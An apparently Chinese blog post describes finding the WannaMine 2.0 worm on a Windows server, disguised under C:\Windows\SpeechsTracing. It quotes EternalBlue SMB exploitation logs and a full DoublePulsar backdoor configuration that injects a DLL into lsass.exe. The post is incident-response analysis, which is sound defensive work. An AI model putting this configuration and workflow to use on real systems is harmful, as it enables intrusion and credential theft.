近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。

打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:\Windows\SpeechsTracing\spoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:

C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt

出于好奇心紧接着打开stage1.txt,看到如下内容:

[*] Connecting to target for exploitation.

    [+] Connection established for exploitation.

[*] Pinging backdoor...

    [+] Backdoor not installed, game on.

[*] Target OS selected valid for OS indicated by SMB reply

[*] CORE raw buffer dump ( bytes):

0x00000000    6e  6f             Windows Server

0x00000010          6e          R2 Enterpris

0x00000020                   e  Service P

0x00000030    6b                                   ack .

[*] Building exploit buffer

[*] Sending all but last fragment of exploit packet

    ................DONE.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Starting non-paged pool grooming

    [+] Sending SMBv2 buffers

        ..........DONE.

    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Sending last fragment of exploit packet!

    DONE.

[*] Receiving response from exploit packet

这不正是一个SMB攻击,再看一下同目录下的stage2.txt:

[+] Selected Protocol SMB

[.] Connecting to target...

[+] Connected to target, pinging backdoor...

    [+] Backdoor returned code:  - Success!

    [+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2

    SMB Connection string is: Windows Server  R2 Enterprise  Service Pack

    Target OS is:  R2 x64

    Target SP is:

    [+] Backdoor installed

    [+] DLL built

    [.] Sending shellcode to inject DLL

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Command completed successfully

<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">

  <inputparameters>

    <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">

      <value>10.244.251.57</value>

    </parameter>

    <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>

    <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">

      <default>stdout</default>

      <value>stdout</value>

    </parameter>

    <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">

      <default>false</default>

      <value>false</value>

    </parameter>

    <paramchoice name="Protocol" description="Protocol for the backdoor to speak">

      <default>SMB</default>

      <value>SMB</value>

      <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>

      <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>

    </paramchoice>

    <paramchoice name="Architecture" description="Architecture of the target OS">

      <default>x64</default>

      <value>x64</value>

      <paramgroup name="x86" description="x86 32-bits"></paramgroup>

      <paramgroup name="x64" description="x64 64-bits"></paramgroup>

    </paramchoice>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <default>OutputInstall</default>

      <value>RunDLL</value>

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">

        <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>

      <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">

        <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">

          <value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>

        </parameter>

        <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

        <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">

          <default>lsass.exe</default>

          <value>lsass.exe</value>

        </parameter>

        <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

      </paramgroup>

      <paramgroup name="RunShellcode" description="Run raw shellcode">

        <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>

    </paramchoice>

  </inputparameters>

  <outputparameters>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">

        <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

    </paramchoice>

  </outputparameters>

</config>

基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。

服务器中了蠕虫病毒Wannamine2.0小记的更多相关文章

  1. Window应急响应(二):蠕虫病毒

    0x00 前言 ​ 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...

  2. 3.Windows应急响应:蠕虫病毒

    0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播, 每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序.常见的蠕虫 ...

  3. 30天轻松学习javaweb_Eclipse在修改了web.xml后将自动更新到tomcat服务器中

    context.xml中增加<WatchedResource>WEB-INF/web.xml</WatchedResource>,Eclipse在修改了web.xml后将自动更 ...

  4. 注册asp.net 4.0版本到IIS服务器中

    在IIS服务器的运维的过程中,有时候部署asp.net网站发现未安装.net framework对应版本信息,此时就需要重新将.net framework对应的版本注册到IIS中,此处以重新注册.ne ...

  5. [转帖]Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染

    Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染 https://www.kubernetes.org.cn/5951.html 本来想说可以用 official版本的镜像 但是一 ...

  6. 关于winlogo.exe中了“落雪”病毒的解决方法

    Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出.该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行,若不是 ...

  7. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  8. Ramnit蠕虫病毒分析和查杀

    Ramnit是一种蠕虫病毒.拥有多种传播方式,不仅可以通过网页进行传播,还可以通过感染计算机内可执行文件进行传播.该病毒在2010年第一次被安全研究者发现,从网络威胁监控中可以看出目前仍然有大量的主机 ...

  9. Trick蠕虫病毒来袭!幕后主使竟是一名高中生“黑客”!

    黑客一直是美国电影中的重要元素,很多经典大片中都有黑客的身影,如战争游戏.黑客帝国等.电影中黑客总是神通广大.行侠仗义,<战争游戏>中的年轻黑客大卫•莱特曼利用黑客技术避免引爆核武器,&l ...

随机推荐

  1. verilog语法实例学习(13)

    verilog代码编写指南 变量及信号命名规范  1. 系统级信号的命名.  系统级信号指复位信号,置位信号,时钟信号等需要输送到各个模块的全局信号:系统信号以字符串Sys开头.  2. 低电平有效的 ...

  2. CentOS7 下 keepalived 的安装和配置

    安装前准备:yum -y install gcc gcc-c++ autoconf automake make yum -y install zlib zlib-devel openssl opens ...

  3. Java线程池 / Executor / Callable / Future

    为什么需要线程池?   每次都要new一个thread,开销大,性能差:不能统一管理:功能少(没有定时执行.中断等).   使用线程池的好处是,可重用,可管理.   Executor     4种线程 ...

  4. ceph 底层代码分享

    一.底层工作队列 二.对象操作 三.上下文(Context)代码分析:

  5. Arrays.asList中所遇到的坑

    前言 最近在项目上线的时候发现一个问题,从后台报错日志看:java.lang.UnsupportedOperationException异常 从代码定位来看,原来是使用了Arrays.asList() ...

  6. 建立一个基本的UI

    本章让你熟悉Xcode来写应用程序.你会熟悉Xcode项目的结构,并学习如何在基本项目组件中导航.通过整个课程中,您将开始为FoodTracker应用程序制作一个简单的用户界面(UI),并在模拟器查看 ...

  7. 译:4.RabbitMQ Java Client 之 Routing(路由)

    在上篇博文 译:3.RabbitMQ 之Publish/Subscribe(发布和订阅)  我们构建了一个简单的日志系统 我们能够向许多接收者广播日志消息. 在本篇博文中,我们将为其添加一个功能 - ...

  8. 语音识别(SR)的秘密

    语音识别(SR)功能是当今国外操作系统的标准特征,而国产操作系统根本不具备这样的特质,并且国家队没有相关的主观动力.去开发实际可用的语音识别系统.与国外相比,国产操作系统落后了一大节子,怪谁? 如何让 ...

  9. [转]新人常识普及:我们为什么必须会git和maven

    转自贴吧:http://tieba.baidu.com/p/3458400116 鉴于本吧多新人,新人又需要多交流才能进步,今天就给新人们讲讲git和maven的必要性,因为,他们的重要性,远远超过很 ...

  10. jupyter修改根目录

    找到jupyter的快捷方式,然后修改目标: 首先在快捷方式上右键单击,选择属性: 然后将目标那里替换自己想要的目录: 网上有的教程说保留%USERPROFILE%,其实这是受系统对路径解析的影响的. ...